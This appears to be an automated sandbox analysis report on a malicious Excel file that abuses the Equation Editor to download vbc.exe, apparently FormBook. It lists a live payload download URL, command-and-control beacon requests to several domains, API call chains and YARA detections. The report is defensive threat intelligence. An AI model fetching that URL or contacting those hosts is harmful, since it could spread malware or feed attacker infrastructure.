00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /75/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.31Connection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036D04FF
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 14 May 2022 13:20:49 GMTContent-Type: text/htmlContent-Length: 291ETag: "627e7264-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 13:21:05 GMTContent-Type: text/htmlContent-Length: 466Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 71 2e 63 6f 6d 2f 34 30 34 2f 73 65 61 72 63 68 5f 63 68 69 6c 64 72 65 6e 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a c4 e3 b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da a1 a3 a1 a3 a1 a3 a1 a3 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e b7 b5 bb d8 d6 f7 d2 b3 3c 2f 61 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a href="/"></a></body></html>
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comI equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
          Source: EQNEDT32.EXE, 00000002.00000003.965529883.000000000069F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.971155692.0000000000614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.33.31/75/vbc.exe
          Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.33.31/75/vbc.exehhC:
          Source: EQNEDT32.EXE, 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.33.31/75/vbc.exej
          Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, 00000004.00000000.968426551.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.1008792318.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.1022782803.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.1011703149.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000245149.0000000008611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 00000007.00000000.1022834782.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77AC4BD4.emfJump to behavior
          Source: unknownDNS traffic detected: queries for: www.arjimni.com
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036D04FF
          Source: global trafficHTTP traffic detected: GET /75/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.31Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1Host: www.arjimni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1Host: www.contractornurd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1Host: www.tw-life.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1Host: www.yiwanggkm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_0040580F

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
